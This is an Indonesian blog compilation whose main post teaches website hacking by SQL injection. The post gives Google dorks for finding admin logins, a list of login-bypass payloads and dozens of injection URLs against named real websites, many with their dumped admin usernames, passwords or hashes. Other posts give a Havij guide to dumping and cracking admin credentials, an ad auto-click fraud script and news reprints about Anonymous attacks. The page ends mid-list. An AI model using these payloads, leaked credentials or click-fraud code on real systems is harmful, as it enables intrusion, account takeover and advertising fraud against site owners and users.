CARA HACKING WEBSITE DENGAN SQL INJECTION

apa sih SQL INJECTION itu ?
Pengertian SQL Injection dalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client.

Sebab terjadinya SQL Injection
1) Tidak adanya penanganan terhadap karakter – karakter tanda petik satu ’ dan juga karakter double minus -- yang menyebabkan suatu aplikasi dapat disisipi dengan perintah SQL.
2) Sehingga seorang Hacker menyisipkan perintah SQL kedalam suatu parameter maupun suatu form.
Bug SQL Injection berbahaya ?
1) Teknik ini memungkinkan seseorang dapat login kedalam sistem tanpa harus memiliki account.
2) Selain itu SQL injection juga memungkinkan seseorang merubah, menghapus, maupun menambahkan data–data yang berada didalam database.
3) Bahkan yang lebih berbahaya lagi yaitu mematikan database itu sendiri, sehingga tidak bisa memberi layanan kepada web server.
Apa saja yang diperlukan untuk melakukan SQL Injection ?
1) Internet Exploler / Browser
2) PC yang terhubung internet
3) Program atau software seperti softice


Contoh sintaks SQL Injection
<span>Contoh </span><span>sintak SQL dalam PHP</span>
1) $SQL = “select * from login where username =’$username’ and password = ‘$password’”; , {dari GET atau POST variable }
2) isikan password dengan string ’ or ’’ = ’
3) hasilnya maka SQL akan seperti ini = “select * from login where username = ’$username’ and password=’pass’ or ‘=′”; , { dengan SQL ini hasil selection akan selalu TRUE }
4) maka kita bisa inject sintax SQL (dalam hal ini OR) kedalam SQL
Penanganan SQL Injection

1) Merubah script php
2) Menggunakan MySQL_escape_string
3) Pemfilteran karakter ‘ dengan memodifikasi php.ini
1. Merubah script php


Contoh script php semula :
$query = "select id,name,email,password,type,block from user " .
"where email = '$Email' and password = '$Password'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
else if(!empty($Id) && !empty($name) && !empty($email) && !empty($password));
Script diatas memungkinkan seseorang dapat login dengan menyisipkan perintah SQL kedalam form login. Ketika hacker menyisipkan karakter ’ or ’’ = ’ kedalam form email dan password maka akan terbentuk query sebagai berikut :
Maka dilakukan perubahan script menjadi :
$query = "select id,name,email,password,type,block from user".
"where email = '$Email'";
$hasil = mySQL_query($query, $id_mySQL);
while($row = mySQL_fetch_row($hasil))
{
$Id = $row[0];
$name = $row[1];
$email = $row[2];
$password = $row[3];
$type = $row[4];
$block = $row[5];
}
if(strcmp($block, 'yes') == 0)
{
echo "<script>alert('Your account has been blocked');
document.location.href='index.php';</script>\n";
exit();
}
$pass = md5($Password);
else if((strcmp($Email,$email) == 0) && strcmp($pass,$password) == 0));


2. Menggunakan MySQL_escape_string

Merubah string yang mengandung karakter ‘ menjadi \’ misal <span>SQL injec’tion menjadi SQL injec\’tion</span>
Contoh : $kar = “SQL injec’tion”;
$filter = mySQL_escape_string($kar);
echo”Hasil filter : $filter”;
Hasilnya :
3. Pemfilteran karakter ‘ dengan memodifikasi php.ini

Modifikasi dilakukan dengan mengenablekan variabel magic_quotes pada php.ini sehingga menyebabkan string maupun karakter ‘ diubah menjadi \’ secara otomatis oleh php
Contoh :
Contoh script yang membatasi karakter yang bisa masukkan :
function validatepassword( input ) good_password_chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
validatepassword = true for i = 1 to len( input )
c = mid( input, i, 1 ) if ( InStr( good_password_chars, c ) = 0 ) then validatepassword = false exit function end if next end function
Implementasi SQL Injection

1) Masuk ke google atau browse yg lain
2) Masukkan salah satu keyword berikut
"/admin.asp" "/login.asp" "/logon.asp" "/adminlogin.asp" "/adminlogon.asp" "/admin_login.asp" "/admin_logon.asp" "/admin/admin.asp" "/admin/login.asp" "/admin/logon.asp" {anda bisa menambahi sendiri sesuai keinginan anda}
3) Bukalah salah satu link yang ditemukan oleh google, kemungkinan Anda akan menjumpai sebuah halaman login (user name danpassword).
4) Masukkan kode berikut :
User name : ` or `a'='a Password : ` or `a'='a (termasuk tanda petiknya)
5) Jika berhasil, kemungkinan Anda akan masuk ke admin panel, di mana Anda bisa menambahkan berita, mengedit user yang lain, merubah about, dan lain-lain. Jika beruntung Anda bisa mendapatkan daftar kredit card yang banyak.
6) Jika tidak berhasil, cobalah mencari link yang lain yang ditemukan oleh google.
7) Banyak variasi kode yang mungkin, antara lain :
User name : admin Password : ` or `a'='a atau bisa dimasukkan ke dua–duanya misal :
‘ or 0=0 -- ; “ or 0=0 -- ; or 0=0 -- ; ‘ or 0=0 # ;
“ or 0=0 # ; ‘ or’x’=’x ; “ or “x”=”x ; ‘) or (‘x’=’x
8) Cobalah sampai berhasil hingga anda bisa masuk ke admin panel

Cara pencegahan SQL INJECTION
1) Batasi panjang input box (jika memungkinkan), dengan cara membatasinya di kode program, jadi si cracker pemula akan bingung sejenak melihat input box nya gak bisa diinject dengan perintah yang panjang.
2) Filter input yang dimasukkan oleh user, terutama penggunaan tanda kutip tunggal (Input Validation).
3) Matikan atau sembunyikan pesan-pesan error yang keluar dari SQL Server yang berjalan.
4) Matikan fasilitas-fasilitas standar seperti Stored Procedures, Extended Stored Procedures jika memungkinkan.
5) Ubah "Startup and run SQL Server" menggunakan low privilege user di SQL Server Security tab.
Hacking adalah seni. Hacking adalah perpaduan dari pengetahuan, kreatifitas dan kesabaran. Jika Anda memiliki ketiga-tiganya Anda akan berhasil.
dibawah ini saya akan berikan kode SQL INJECTION , kepada teman-teman hacker semua .. apabila menyukai artikel-artikel kami.. silahkan dukung halaman ini klik " suggest friends / klik saran ke teman -teman kalian " agar halaman ini penuh dengan komunitas yang ingin belajar mengenal dunia cyber hacking...
=========kode SQL INJECTION =========
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a
=========================
dan dibawah ini contoh website yang pernah kami hack dengan SQL INJECTION.
=============================
http://www.caashaq.com/news_detail.php?nid=72+AND+1%3D2+UNION+SELECT+1%2C2%2C3%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2C5%2C6%2C7 from admin--http://www.caashaq.com/admin/admin:=8z,}yn98)(%
http://www.allkisima.com/news_detail.php?nid=481+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2Cdatabase%28%29%2C4%2C5%2C6 from admin--http://www.allkisima.com/admin/admin:yaacaziz1376***7
http://www.eigeradventure.com/productdetail.php?id=2326+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+user_eiger--http%3A%2F%2Fwww.eigeradventure.com%2Fadmin%2Fadmin%3Ay0n0ono
http://www.hybridracers.net/files/news_detail.php?id=28+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2Cgroup_concat%28login%2C0x3a%2Cpassword%29%2C7+from+login_table--http%3A%2F%2Fwww.hybridracers.net%2Fadmin%2Ffiles%2Flogin.phpevomag%3Ajapanese%2Cravi%3Asatan%2Cyanesh%3Apuryag%2Cadmin%3Aadmin
http://www.rpmpizza.com/newsdetail.php?nid=2+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pwd%29%2C4%2C5%2C6%2C7+from+users--http%3A%2F%2Fwww.rpmpizza.com%2Fadm%2Fdomino%3Apizza
http://www.awesomejewellery.com.au/detail.php?ID=1118+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C6+from+Login--jewellery%3Agc4217
http://www.acieap.com/news_detail.php?nid=79+AND+1%3D2+UNION+SELECT+1%2Cversion%28%29%2Cgroup_concat%28user%2C0x3a%2Cpass%29%2C4 from admin--admin:5fcae8742642cea7f9b6ff81fbc02011=jpac123http://www.acieap.com/admin/
http://arindum.com/php/newsDetails.php?nid=5+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cuserpassword%29%2C4%2C5+from+admin--http%3A%2F%2Farindum.com%2Fwebadmin%2F admin:adtpl
http://www.realbank.com.ph/news.php?id=27+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2Cversion%28%29%2C5%2C6%2C7+from+tbl_user--http%3A%2F%2Fwww.realbank.com.ph%2Fadmin%2Frealadmin%3A3dEg5iou
http://www.sciencewithme.com/swm_adminadmin : monkeyhttp://www.sciencewithme.com/articles.php?cid=2+AND+1%3D2+UNION+SELECT+0%2C1%2Cgroup_concat%28admin%2C0x3a%2Cpass%29%2C3+from+admin--
http://horufadhi.com/news_detail.php?nid=247+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cgroup_concat%28id%2C0x3a%2Clogin%2C0x3a%2Cpassword%29%2C4%2C5%2C6 from admin--http://horufadhi.com/admin/1:admin:##darwiish##
http://www.solusisehat.net/berita.php?id=1047+and+1%3D2+union+select+0%2Cgroup_concat%28nama_login%2C0x3a%2Csandi%29%2C2%2C3%2C4%2C5%2C6+from+ssc_user--http%3A%2F%2Fwww.solusisehat.net%2Fadmin%2F
http://www.theglobejournal.com/detil-berita.php?id=3478+and+1%3D2+union+select+0%2C1%2C2%2C3%2Cgroup_concat%28user%2C0x3a%2Cpass%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13+from+user--http%3A%2F%2Fv2.theglobejournal.com%2Fadmin%2Findex.php
http://www.caffedangelo.com/isi.php?id=26+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C8%2C9%2C10%2C11%2C12%2C13%2C14+from+user--aman%3Ab1n4ryd140f86ee06d118fc4aacd79a1fe0e80735abfdb%2Cuser1%3Ab1n4ryd8162f7df5f05a7802cad3a2b17dbdf2e1405027%2Cadmin%3Ab1n4ry6811f07a5ed0b8ad8970ae44b5dd2e6572fc3996http%3A%2F%2Fwww.caffedangelo.com%2Fcms%2Flogin.php
http://www.organicindonesia.org/04buletin-isi.php?id=20+AND+1%3D2+UNION+SELECT+0%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C2%2C3%2C4%2C5+from+tb_user--miryadi%3Ac28463b3f2fc4b65022609302b258f5a284ac23b%2Cadmin%3A8648d71c7dac323674e7024b31b481ae0a59d2e6%2Cariyuswanto%3A1d1fdba8cc76a3facc58226cef01e636139e416b
http://www.smk1blora.com/isi.php?id=3+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cversion%28%29%2C4%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12+from+cni_user--admin%3ABCFYN1swXXhXMgc1DmI%3D%2Ckomeng%3AUz8MZFo1CWFXNA5p
http://ikapijogja.or.id/isi.php?id=5+and+1%3D2+union+select+0%2C1%2C2%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C5%2C6%2C7%2C8%2C9%2C10+from+cni_user--superadmin%3AXTEPZwtkCGAFZg%3D%3D%2Cuser%3AXTFcNFk2DGQCYQ%3D%3D%2Cadmin%3AUT0BaQhnCGA%3D%2Clinda%3AAGxfN1s0AWlXNA%3D%3D
http://www.undana.ac.id/isi.php?id=170+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2Cversion%28%29%2Cgroup_concat%28user_name%2C0x3a%2Cuser_pass%29%2C13+from+cni_user--admin%3AXTEPZwtkCGAFZg%3D%3D
http://www.mobielvlaanderen.be/persberichten/artikel.php?id=163+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18+from+admin--admin%3Amobcel%2Cpaul%3Apb
http://marqueesole.com/php/client/product.php?id=224+AND+1%3D2+UNION+SELECT+group_concat%28idadmin%2C0x3a%2Clogin%2C0x3a%2Cpasswd%29+from+admin--admin%3A3129bbz
http://www.rayner.com/products.php?id=22+and+1%3D2+union+select+0%2C1%2C2%2C3%2C4%2C5%2C6%2C7%2Cversion%28%29%2C9%2C10%2C11%2C12%2Cgroup_concat%28name%2C0x3a%2Cpass%29%2C14%2C15%2C16%2C17+from+auth--rayneriol%3Aridley
http://dtincr.ph/news.php?id=1+AND+1%3D2+UNION+SELECT+0%2Cgroup_concat%28user_id%2C0x3a%2Cuser_password%29+from+tbl_auth_user--admin%3Aadmin%2Cwebmaster%3A0c458fde308cd12d
http://www.tup.edu.ph/news.php?id=8+AND+1%3D2+UNION+SELECT+0%2C1%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C4%2C5%2C6%2C7%2C8%2C9%2C10+from+users--webadmin:*55EC63DFD8AC4F630963A13E4577474560E07796,eusores:*E3FFD4AF20224F2D11A2D45594FEB3EB088099F9,gracelauzon:*C28876CC6C08587141376E2B4C7F5A085DBADE58
http://www.inf-fni.org/pages.php?id=7+and+1%3D2+union+select+0%2C1%2C2%2C3%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C5%2C6%2C7%2C8%2C9%2C10%2C11+from+administrator--cjadmin%3A0bfd3afdab4a11dea1584bee8cf7ad83%2CTnCi2010%3A634ddede18cf94cdedcd49ad54643418http%3A%2F%2Fwww.inf-fni.org%2Fadmin
http://www.crnewswire.com/news_details.php?nid=292+AND+1%3D2+UNION+SELECT+0%2C1%2C2%2Cversion%28%29%2Cgroup_concat%28CR_U_USERID%2C0x3a%2CCR_U_PASSWORD%29%2C5+from+CR_ADMIN_USERS--http%3A%2F%2Fwww.crnewswire.com%2Fadmin%2Fadmin_login.phppchavali%3Arajah321%2Cmohan%3Amohan123%2Cnarayana%3Anarayana%2Cmohannvk%3Anandagiri%2Cjagadeesh%3A12%2Csyakaitis%3Aadmin%2Cjmorehouse%3Aeditor%2Ccandi%3Adesigner%2Clindsey%3Anetworm%2Cjchristy%3Apublisher
http://www.auditalpro.com/news_detail.php?nID=10+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2C2%2C3%2Cdatabase%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29 from jos_users--audital_groovadmin:bb6b718fd26f0cea9f2f938e7d7a9964:cXBSGaKKroqtQoHLs87RC8NW5xUMGPBs,xxx:e35eb22cae602d94cc1559e6d05fb5d2:AfCMR5JBju0nU2YrlEMdZpXlpnNwGsbA,chalinee:a47df7f4d47f31726fc556b2060ac2ab:YMk2qZyUqczwUyUEWTalSY0YUz4prQK5,wit:4ec2519d7db71eee6b71fd2167c2f703:tMBWVurN1oR9IhYGEP95nFywsQPJsVbT,groov:f4169b18c7867643153bb0181f299277:qp2dqka0BozI7tunFYwkKR5L3KdiSIj1 http://www.auditalpro.com/cms/
----
http://www.milim.com/news.php?id=100+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2C2%2C3%2C4%2C5%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C7+from+cms_users--andrew%3Ad914e3ecf6cc481114a3f534a5faf90b%2Cjason%3A2b877b4b825b48a9a0950dd5bd1f264d
http://www.cdtc.an/main.php?id=-6+union+select+0%2C1%2Cgroup_concat%28username%2C0x3a%2Cpassword%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23+from+oemp_administrators--admin%3Atursi0ps%2Ccarolien%3A123NBV%2Cdolphinsuites%3Anieuwsbrief%2Csubstation%3Adolfijn07
http://www.akritec.com/backoffice/index.phpakywebadmin:adminakyweb
... ASP Bug ...http://www.antiqueoakfurniture.co.uk/category.asp?catid=14+and+1%3D2+union+select+0%2C1%2Cversion%28%29%2Cgroup_concat%28adminname%2C0x3a%2Cpassword%29%2C4%2C5%2C6%2C7%2C8%2C9+from+admin--admin%3Ahennythehoover1958
http://home.birzeit.edu/wsi/old_website/news_details.php?pid=15+AND+1%3D2+UNION+SELECT+0%2Cversion%28%29%2Cgroup_concat%28username%2C0x3a%2Cpassword%2C0x3c62723e%29%2C3%2C4+from+bak_users--admin%3Ae4c87c6f6ffea444734bd8bd739440c5%3ABhIDAuGOCgVgB6ufMzNI69fWnJRnubdF


Sumber: http://www.hi-techmall.org/geek/blog/cara-hacking-website-sql-injection

Peretas Anonymous Serang Sejumlah Situs Web Pemerintah Indonesia




Peretas Anonymous Serang Sejumlah Situs Web Pemerintah Indonesia


Gambar yang digunakan kelompok hacker Anonymous untuk memberi peringatan kepada Pemerintah Indonesia.

JAKARTA, KOMPAS.com — Penangkapan hacker atau peretas situs resmi Presiden Susilo Bambang Yudhoyono (SBY), yaitu www.presidensby.info, oleh Tim Cyber Crime Mabes Polri memicu reaksi dari kelompok peretas internasional terkemuka, Anonymous.
Mereka pun menyatakan "perang" terhadap Pemerintah Republik Indonesia dengan menumbangkan situs-situs berdomain ".go.id". Satu per satu situs-situs pemerintah bertumbangan dan dengan target utama kembali melumpuhkan situs Presiden SBY.
Sejak Selasa malam sampai Rabu dini hari, tak kurang dari tujuh domain telah dilumpuhkan dan sebagian di-deface alias diganti tampilan berisi pesan peringatan. Situs-situs yang sudah dilumpuhkan antara lain beberapa sub-domain di situs KPPU, BPS, KBRI Tashkent, Kemenhuk dan HAM, Kemensos, dan Kemenparekraf, bahkan Indonesia.go.id.
"Government of Indonesia, you cannot arrest an idea NO ARMY CAN STOP US #Anonymous #OpFreeWildan #FreeAnon," demikian pernyataan di akun Twitter kelompok peretas tersebut, Selasa (30/1/2013). Kira-kira artinya, "Pemerintah Indonesia, Anda tidak dapat membelenggu sebuah pemikiran. Tidak ada pasukan apa pun yang dapat menghentikan kami."
Wildan disebut sebagai nama peretas situs web resmi Presiden. Sebelumnya, Tim Cyber Crime Mabes Polri menangkap pria berinisial WYA (20), warga Kabupaten Jember, Jawa Timur, dan telah diamankan ke Jakarta.
"Memang benar WYA ditangkap oleh tim Mabes Polri," kata Kapolres Jember AKBP Jayadi, Senin lalu, seperti dilansir Antara.
Ia merupakan lulusan sekolah menengah kejuruan (SMK) yang bekerja sebagai operator warung internet (warnet) dan teknisi komputer di salah satu warnet di Jalan Letjen Suprapto, Jember, yang sudah bekerja selama dua tahun.
Presidensby.info yang menjadi salah satu penyampai informasi dan berita tentang kegiatan Presiden Susilo Bambang Yudhoyono kepada masyarakat sempat diretas oleh kelompok yang menamakan dirinya "Jemberhacker Team" pada 9 Januari 2013.
Saat diretas, laman tersebut menampilkan latar belakang hitam dengan tulisan warna hijau di bagian atas "Hacked by MJL007", sementara di bawahnya tertera sebuah logo dan tulisan "Jemberhacker Team" berwarna putih.

Hacker Situs SBY Ditangkap,Anonymous Melabrak Indonesia


Jakarta - Penangkapan Wildan, peretas situs Presiden SBY, mendapat perhatian dari Anonymous. Selain mengeluarkan pernyataan keras, beberapa situs pemerintahan pun mereka retas sebagai bentuk protes.

"Government of Indonesia, you cannot arrest an idea NO ARMY CAN STOP US #Anonymous #OpFreeWildan #FreeAnon," demikian tulis Anonymous melalui akun Twitternya.

Sontak tweet ini mendapat respons dari tweeps. Berdasarkan informasi yang beredar di situs mikroblogging tersebut, situs yang mereka lumpuhkan antara lain milik Kemenkumham, Kemenparekraf dan Indonesia.go.id.

Di akun Twitter Anonymous Indonesia (@anon_indonesia), sejumlah pengguna Twitter pun menyuarakan pendapat mereka. Pada intinya, mereka menilai apa yang dilakukan Wildan justru seharusnya membuat pemerintah berkaca mengenai lemahnya sistem keamanan di sejumlah situs pemerintahan.

Peretasan terjadi pada Selasa malam hingga Rabu dini hari. Saat ditelusuri detikINET, Rabu (30/1/2013), situs-situs tersebut saat ini sudah normal kembali.

Seperti diketahui, pihak kepolisian telah mengamankan Wildan, penjaga warnet yang meretas situs www.presidensby.info. Situs Presiden SBY ini sempat diusili oleh pelaku dengan meninggalkan identitas sebagai Jember Hacker.

Berdasarkan pelacakan yang dilakukan ID-SIRTII, lokasi IP Address dan DNS pelaku bukan dari Indonesia, melainkan dari Texas, Amerika Serikat. Meski terlacak dari Negeri Paman Sam, pelaku bisa saja orang Indonesia yang memalsukan IP-nya ke negara lain. Ini biasa dilakukan para peretas untuk mengaburkan jejak.

Wildan kini diamankan petugas Bareskrim Mabes Polri di sebuah warnet di Jember. Juru bicara Kemenkominfo mengatakan, atas aksinya, Wildan terancam penjara 12 tahun dan denda Rp 12 miliar.

Sumber: Detik.com

Trik ampuh turunkan alexa rank ( HOT 2013 )

autosurf

Cara daftarnya sederhana dan mudah :
1. Masuk situsnya www.surftrafficexchange.com (jika daftarlangsung kamu tidak akan mendapatkan bonusnya Jika ingin mendapatkan bonus daftar melalui Referral klik disini/Liat banner di atas noh

 2. Masukan user name dan email kamu lalu submit
3. Buka email kamu, klik activation link
4. Klik member log in, log in dengan ID dan Password yang di berikan lewat email
5. Di member area, memberikan URL yang akan di publikasikan untuk kemudian klik Add Url dan ikuti petunjuknya.
6. Kembali ke member area, klik tombol Get Referral Code, pilih tipe banner yang kamu suka lalu copy code nya dan paste kan di side bar blog kamu.
7. Selesai

anda Juga Bisa Daftar DISINI

Jika kita sudah diterima sebagai member, maka kita akan diberikan fasilitas untuk membuka website, member-member yang lain secara acak setiap 15 detik berganti page atau blog yang lain, begitu juga member yang lainnya secara otomatis saling mengunjungi dan ini diatur secara bergantian oleh surftraffic, dan semakin besar credit kita, maka semakin besar kemungkinan web/blog kita akan ditampilkan pada member yang lainnya, kita hanya butuh 1 tab firefox, untuk menjalankan autobrowsing 15 rotation secara acak.

Ini adalah impian para blogger yang ingin memulai dipercaya oleh pengiklan reviewer. Saya pribadi berharap jika berjalan lebih lama autosurf ini maka bukan tidak mungkin Peringkat Alexa akan menurun tajam secara cepat dibawah 1 juta dalam beberapa minggu atau bahkan dalam hitungan hari :D .
Note : Itu baru Pilihan Pertama Untuk Cara Cepat Menurunkan Ranking Alexa gan, masih ada Pilihan Selanjutnya .. hhe ..

Cara mematikan klik kanan dengan gambar

Cara mematikan klik kanan dengan gambar



 
Hello Sobat Blogger, kembali Saya sapa Kalian, dan kali ini Saya akan memberikan sebuah Tips Blogger, yaitu "Cara Mendisbled (Mematikan) Klik Kanan Dengan Gambar Pada Blog". Sebelumnya Saya sudah pernah Posting tentang "Cara Mendisbled (Mematikan) Klik Kanan Pada Blog", dan "Cara Mendisable Klik Kanan Pada Gambar Di Blog". Sebenarnya Tips ini tidak jauh berbeda dengan Tips sebelumnya, yang membedakannya hanyalah Tips ini menggukan Gambar. OK kita langsung ke langkah-langkahnya saja.

[1]. Pertama, pastinya LogIn dulu ke BLOG Kalian masing2.
[2]. Trus cari Rancangan --> Elemen Laman --> Tambah Gadget (HTML/JavaScript).
[3]. Lalu Copy dan Paste-kan Code dibawah ini ke dalamnya.
<script type='text/javascript'>
var DADrightclicktheme = 'dark';
var DADrightclickimage = 'http://1.bp.blogspot.com/-r13ptOaLaBM/UQOcbhln23I/AAAAAAAAACE/y_AX8-6cg9M/s1600/untitled.JPG';
</script>
<script type='text/javascript' src="http://jmk-js.googlecode.com/files/Right%20Click%20Is%20Disabled.js"> </script>
KETERANGAN :
* Tulisan yang berwarna Merah, ganti sesuai dengan latar belakan Template Blog Kalian. (Misalnya latar belakan Template Blog Kalian berwarna Gelap, ganti dengan "dark" [tanpa tanda petik] ).
* Dan tulisan yang berwarna Biru, Kalian bisa menggantinya dengan Gambar Kalian sendiri.

[4]. Dan langkah terakhir tentunya SIMPAN dan lihat hasilnya.

OK, sekian dulu Tips Blogger kali ini, semoga Tips kali ini bermanfaat buat para Blogger semua, dan jika ada pertanya tentang Tips ini, silahkan Kalian tinggalkan pertanyaan Kalian di Kotak Komentar di bawah.

Script Auto Klik Iklan di Blogspot ( HoT )

Script Auto Klik Iklan di Blogspot

Ini merupakan cara curang untuk mendapatkan banyak klik dari blog kita. Cara ini biasa digunakan untuk bermain Blackhat Adsense. Dengan cara ini kamu akan cepat mendapatkan uang dari memasang iklan di blog atau website kamu. Tapi perlu di ingat karena ini cara curang akunmu bisa di banned. Jadi cara blackhat sangat tidak di anjurkan^^ karena sewaktu-waktu kamu bisa langsung di banned tanpa pemberitahuan.

Cara kerja script Auto Click ini sangat sederhana, yaitu ketika visitor datang, maka iklan yang telah kamu jadikan target akan terklik secara otomatis saat pengunjung melakukan klik di blog kamu. Iklan akan muncul pada jendela baru, lalu membuat cookies agar hanya sekali saja yang terklik. Script akan bekerja jika seluruh blog terloading secara sempurna. Jika blog kamu belum terloading sempurna, maka script belum berjalan.

Berikut ini SCRIPT nya...

<script type="text/javascript">
function addEvent(obj, eventName, func){
if (obj.attachEvent) {
obj.attachEvent("on" + eventName, func);
} else if(obj.addEventListener)
{ obj.addEventListener(eventName, func, true);
} else
{ obj["on" + eventName] = func;
}
} addEvent(window, "load", function(e){
addEvent(document.body, "click", function(e)
{ if(document.cookie.indexOf("sct=dd") == -1)
{
var w = window.open('Link target','height=10, width=10, top=1900, left=1900, scrollbars=yes')
document.cookie = "sct=Reza";
window.focus(); } }); });
</script>


Pasang script tersebut di widget blog kamu

Deface Website





Cara Hack Website Dengan Tool Havij Sekarang saatnya untuk mempermudah sobat untuk melakukan hacking dengan menggunakan tool yang sangat akurat. Havij mungkin kata ini tidak asing lagi di telinga sobat akan tetapi masih bingung cara melakukannya.




Untuk itu dalam postingan ini saya akan menjelaskan langkah demi langkah buat sobat khususnya bagi pemula yang seperti saya ini. Oke lansung saja sediakan alat dan bahan.

Pertama-tama sobat download tool havij melalui link ini 
Setelah download silahkan install dan kita mulai beraksi.

Karena Toolnya sudah sobat download dan install. berikut langkah selanjutnya yang sobat lakukan.

1.  Cari sasaran di google dengan menggunakan Google dork berikut 
    inurl://berita.php?id=
    atau 
    inurl://group_concat(table_name)from information_schema--
    atau
    intext:"You have an error in your SQL syntaxt"
    dan masih banyak lagi sobat bisa cari melalui google
2. Untuk dork yang pertama misalnya mendapat target seperti 
    www.xxxxxxxxxxxxx.com/berita.php?id=2
sobat dapat tes apakah web tersebut terdapat pesan error dengan cara menambahkan tanda kutip di belakang contoh:
    www.xxxxxxxxxxxxx.com/berita.php?id=2'
kemudian buka url yang telah ditambahkan tanda kutip jika terdapat pesan seperti berikut
   You have an error in your SQL syntax; check the manual that corresponds to your MySQL........
berarti berarti kemungkinan akan berhasil. Namun untuk dork yang kedua dan ketiga di atas sobat tinggal mengambil sebagian url hingga pada xxxxx.id=xxx
seperti contohnya www.xxxxxxxxxxxxx.com/berita.php?id=2

3. Karena telah menemukan taget sekarang buka tool havij yang telah terinstall

4. Kemudian masukkan url website tadi yang telah ditemukan kemudian klik Analyze sehingga tool akan melakukan scan dan tunggu hingga proses
selesai

5. Jika proses selesai maka akan seperti berikut

6. Selanjutnya Klik Tables lalu klik Get Tables sehingga seperti gambar dibawah ini 

7. Kemudian kita cari tabel admin atau user lalu mencari jumlah kolomnya caranya sorot kebawah scrollbar hingga ada kata admin atau user lalu centang kemudian klik Get Columns seperti gambar berikut

8. Jika telah mendapatkan jumlah kolom kita cari data password dan username, caranya centang  pada password dan username kemudian klik Get Data seperti gambar berikut
  
9. Nah sekarang sudah muncul informasi login yaitu nama/username dan sandi/password seperti berikut

terkadang ada password yang berupa md5, jika sobat mendapatkan seperti itu sobat bisa terjemahkan melalui website yang filed pada yang di sediakan tool havij caranya klik icon MD5 kemudian klik Start dan lihat yang valid lalu buka dan terjemahkan password yang membingungkan itu. Atau bisa terjemahkan melalui website ini

10. Sekarang telah mendapatkan password dan username selanjutnya cari halaman login untuk mencarinya sobat tinggal klik Find Admin lalu tunggu hingga ada url yang muncul, buka url/link tersebut dan masuk dengan password dan username yang didapatkan tadi.

Selesai, karena sobat telah login sebagai administrator yang memiliki hak penuh tentang web tersebut terserah mau diapakan itu urusan dan tanggung jawab sobat. Dan seperti sebelumnya yang pernah saya bilang mendapatkan sasaran, target atau mangsa tidaklah mudah diperlukan kesabaran penuh untuk melakukannya.



Sumber :  KLIK DISINI

23 Rahasia Google yg jarang diketahui

23 Kumpulan Rahasia Google yang Jarang Diketahui [Update]tips, trik, tutorial, cara, gratis, download, komputer, facebook, internet, sektim, hack, google, game, games, cheat, tools, free

Orang biasa menggunakan Google hanya untuk mencari tahu apa yang mereka inginkan. Namun, sebenarnya terdapat banyak rahasia yang bisa dijumpai pada mesin pencari ini. Apa saja? Simak penjelasan berikut.

Pernah ada gambar yang tertangkap satelit Google Earth seperti gambar lubang tak berdasar, kota bawah kaut dan kecelakaan mobil. Serupa anehnya, gambar-gambar di Google Street View juga sering menampilkan gambar-gambar aneh.

Untuk melihat semua hal aneh yang bisa dijumpai di Google, berikut rangkuman hal-hal aneh terkeren yang bisa ditemukan di dalam Google Search (pencarian Google).

1. Do A Barrel Roll
